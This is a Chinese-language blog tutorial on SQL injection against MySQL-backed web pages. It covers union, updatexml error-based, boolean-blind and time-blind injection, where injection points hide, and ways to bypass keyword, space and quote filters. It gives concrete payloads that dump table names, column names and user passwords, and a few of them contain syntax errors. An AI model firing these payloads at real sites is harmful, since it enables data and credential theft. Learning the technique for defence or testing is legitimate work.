首页 > 数据库 >SQL注入攻击

SQL注入攻击

时间:2024-06-02 12:28:35浏览次数:14  
标签:函数 攻击 name -- select SQL concat 注入

一.什么是SQL注入

分类:可回显的注入和不可回显的注入以及二次注入;

(1)可回显的注入:可以联合查询的注入,报错注入;

(2)不可回显的注入:Bool盲注,时间盲注;

(3)二次注入;

二.可以联合查询的SQL注入

1.SQL语句中的$id变量

该变量会将GET获取到的参数直接拼接到SQL语句中,如:

?id=1'union select 1 -- -

拼接后SQL语句就变成了:

SELECT Id FROM users WHERE user_id = '-1'union select 1 -- -'

闭合前面的单引号,注释掉后面的单引号,中间写上需要的Payload.

步骤:

(1)判断注入类型

从显示的数据可以看出,经过了数据库的查询,尝试输入1':由此可判断为字符型注入

(2)判断字段数

通过尝试

1'order by 1#
1'order by 2#
1'order by 3#

根据返回的结果判断字段数;

(3)判断数据库

1' union select database(),2#

得到当前数据库名称;

(4)获取表名;

1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#

(5)获取列名;

1'union select group_concat(column_name),2 from information_schema.columns where table_name=table_name()#

此处的table_name()对应的是步骤(4)中获取的表名;

(6)获取数据;

1'union select group_concat(user),group_concat(password) from users#

三.报错注入

1.3种MySQL数据库报错注入的方法,分别是updatexml,floor和exp.

(1)updatexml

函数原型:updatexml(xml_document,xpath_string,new_value)
正常语法:updatexml(xml_document,xpath_string,new_value)

第一个参数:xml_document是string格式,为xml文档对象的名称

第二个参数:xpath_string是xpath格式的字符串

第三个参数:new_value是string格式,替换查找到的负荷条件的数据 作用:改变文档中符合条件的节点的值


payload

爆数据库名:

?id=1'and(select updatexml(1,concat(0x7e,(select database())),0x7e))#

爆表名:

?id=1'and (select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))#

爆列名:

?id=1'and (select updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=table_name()),0x7e))#

table_name()为爆的表名

爆数据:

?id=1'and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e))

(2)floor

简单来说,floor报错的原理是rand和order by或group by 的冲突.

rand():生成0~1之间的随机数,可以给定一个随机数的种子,对于每一个给定的种子,rand()函数都会产生一系列可以复现的数字

group by:是根据一个或多个列对结果集进行分组的sql语句

四.Bool盲注

(1)截取函数

a.

substr():字符串截取函数

使用方法:substr(str,start,length),str为别截取的字符串,start为开始截取的位置,length为截取的长度,例如:substr(user(),1,1);

b.

left():左截取函数

使用方法:left(str,length),例如:left(user(),1)

样例:假设user()函数返回的字符串是“admin”,那么

select a from b where left(a,1) = 'a'
select a from b where left(a,2) = 'ad'

c.

right():右截取函数,使用方法与left函数类似.

(2)转换函数

a.

ascii():ascii函数的作用是将字符串转换为ASCII码,可以避免Payload中出现单引号。

例如:ascii(substr(user(),1,1))

b.

hex():Hex函数可以将字符串的值转换为十六进制的值,使用方法类似ascii函数。

(3)比较函数

if():if函数的作用与1=1和1=2的原理类似,如果我们要盲注的对象为假,则可以通过if的返回结果对页面进行控制,使用方法为if(cond,Ture_result,False_result)

样例:

?id=1 and 1=if(ascii(substr(user(),1,1)),1,1))=97,1,2)

如果返回值的ascii为97则返回1,否则返回2.

五.时间盲注、

1.时间盲注是由于服务器端拼接了SQL语句,可以通过页面响应时间进行按位判断数据。

2.时间盲注常用的函数有sleep() 和benchmark()两个.

a.

sleep():睡眠函数

使用方法:sleep(N),并且搭配substr,ascii使用

样例:

if (ascii (substr(user(),1,1))=114,sleep(5),2)

b.

benchmark():重复执行某个语句的函数,已达到延时的效果。

使用方法:

benchmark(N,expression)

六.注入点的位置及发现

1.常见的注入点位置

(1)GET参数中的注入

可以在地址栏获得URL和参数等

(2)POST中的注入

可以通过抓包操作来发现

(3)User-Agent中的注入

(4)Cookie中的注入

2.判断注入点是否存在

(1)插入单引号

(2)数字型判断

(3)通过数字的加减进行判断

七.绕过

1.过滤关键字:即过滤如select,or,from等的关键字

(1)穿插关键字的方法进行绕过

select-- >selselectect;

or-->oorr

(2)大小写转换进行绕过

select-->selECt

or-->Or

(3)十六进制对关键字的个别字母进行替换

select-->selec\x74

or-->o\x72

2.过滤空格

(1)通过注释绕过

#  --  //  /**/  ;%00

(2)通过URL编码绕过(二次编码)

%20  -->  %2520

(3)通过空白字符绕过

(4)通过特殊符号(如反引号,加号等),利用反引号绕过空格的语句

(5)科学计数法绕过

3.过滤单引号

4.绕过相等过滤

标签:函数,攻击,name,--,select,SQL,concat,注入
From: https://blog.csdn.net/2301_78637299/article/details/139330494

相关文章

  • 【跟着例子学MySQL】学以致用 -- 综合练习
    文章目录前言回顾租赁系统数据库练习高级练习前言举例子,是最简单有效的学习方法。本系列文章以一个贯穿始终的场景,结合多个实例讲解MySQL的基本用法。❔为什么要写这个系列?模仿是最好的老师,实践是检验成果的方法。本系列以实操样例和应用场景为核心,将MySQL基本......
  • 使用Python连接到SQLite3数据库进行数据更新和删除
    SQLite3是一种轻量级的嵌入式关系型数据库管理系统,广泛应用于移动应用、嵌入式设备以及小型Web应用等场景。Python内置了对SQLite3数据库的支持,通过sqlite3模块,可以方便地连接、操作SQLite3数据库。在本文中,我们将学习如何使用Python连接到SQLite3数据库,并进行数据更新和删......
  • openeuler源码安装Postgresql 16
    准备条件OpenEuler(虚拟机):版本:22.03-LTS-SP3下载地址:https://www.openeuler.org/zh/download/PostgreSQL:版本:16.3源码包下载地址:https://www.postgresql.org/ftp/source/操作系统安装安装过程与centos基本一致,此处就省略了,安装的时候可以把需要的网络工具和开发工具包勾......
  • MySQL学习——从命令行调用MySQL 程序
    从命令行(即你的shell或命令提示符)调用MySQL程序时,你需要输入程序名,后跟任何选项或其他参数,以指示程序你想要它执行什么操作。以下是一些示例程序调用的命令。在这些示例中,$> 表示你的命令解释器的提示符;它并不是你需要输入的内容。你实际看到的提示符取决于你的命令解释......
  • Spark SQL的所有语句
     SparkSQL提供了一种基于结构化数据处理的高级API,它允许使用SQL或DataFrameAPI进行数据查询和分析。以下是SparkSQL中常用的语句:创建表格:使用CREATETABLE语句创建表格,可以基于现有数据源或手动定义模式。示例:CREATETABLEtableName(col1INT,col2STRING,......
  • Kali常用攻击方式
    1社会工程学setoolkit1)Social-EngineeringAttacks:社会工程学攻击1)Spear-PhishingAttackVectors:鱼叉式网络钓鱼攻击向量2)WebsiteAttackVectors:网页攻击向量3)InfectiousMediaGenerator:感染式媒介生成器4)CreateaPayloadandListener:创建Payload和Listener......
  • 面试必问:MySQL死锁 是什么,如何解决?(史上最全)
    MySQL死锁接触少,但面试又经常被问到怎么办?最近有小伙伴在面试的时候,被问了MySQL死锁,如何解决?虽然也回答出来了,但是不够全面体系化,所以,小北给大家做一下系统化、体系化的梳理,帮助大家在面试过程中能够脱颖而出,拿到自己心仪的Offer插播一条:如果你近期准备面试跳槽,建议在http:......
  • 基础—SQL—DCL(数据控制语言)之用户管理
    一、引言分类全称描述DCLDataControlLanguage(数据控制语言)用来创建和管理数据库用户以及控制数据库的访问权限 1、图解右边的是我们的 MySQL 的数据库服务器,左边是假设的两个用户  1、DCL主要控制的就是有哪些用户可以来访问这台MySQL服务器。第二个就是当It......
  • 使用 Scapy 库编写 IP 地址欺骗攻击脚本
    一、介绍1.1概述IP地址欺骗(IPSpoofing)是一种网络攻击技术,攻击者伪造其数据包的源IP地址,使其看起来像是从其他合法地址发送的。这种技术常用于各种攻击中,例如DDoS攻击、Man-in-the-Middle(MITM)攻击和拒绝服务(DoS)攻击等。1.2攻击原理IP地址欺骗的核心在于攻击者能够创建带......
  • Linux上安装MySQL
    1).准备工作在安装MySQL数据库之前,我们需要先检查一下当前Linux系统中,是否安装的有MySQL的相关服务(很多linux安装完毕之后,自带了低版本的mysql的依赖包),如果有,先需要卸载掉,然后再进行安装。A.通过rpm相关指令,来查询当前系统中是否存在已安装的mysql软件包,执行指令如下:rpm-qa......